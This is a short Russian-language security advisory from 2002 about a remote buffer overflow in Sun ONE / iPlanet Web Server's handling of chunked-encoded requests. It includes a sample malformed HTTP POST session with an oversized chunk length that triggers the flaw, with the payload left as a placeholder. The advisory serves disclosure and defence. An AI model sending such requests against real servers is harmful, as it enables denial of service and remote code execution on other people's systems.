Security Lab

Переполнение буфера в Sun ONE / iPlanet Web server

Дата публикации:12.08.2002
Всего просмотров:1063
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: При обработке запросов, кодированных механизмом 'Chunked Encoding', Sun ONE/iPlanet не в состоянии должным образом вычислить необходимые размеры требуемого буфера. Удаленный атакующий может создать уродливую сессию, которая вызовет переполнение буфера. Уязвимость может использоваться для выполнения произвольного кода с системными привилегиями.

Пример:

**************Begin Session****************
POST /EEYE.html HTTP/1.1
Host: www.EEYE2002.com
Transfer-Encoding: chunked
Content-Length: 22
4
EEYE
7FFFFFFF
[DATA]
**************End Session******************

Уязвимость обнаружена в iPlanet E-Commerce Solutions iPlanet Web Server 4.x, iPlanet E-Commerce Solutions iPlanet Web Server 4.1-4.1sp9, iPlanet E-Commerce Solutions iPlanet Web Server 6.0-6.0sp2, Sun ONE Web Server 4.1-6.0

Ссылки: Sun™ ONE / iPlanet Web Server 4.1 and 6.0 Remote Buffer Overflow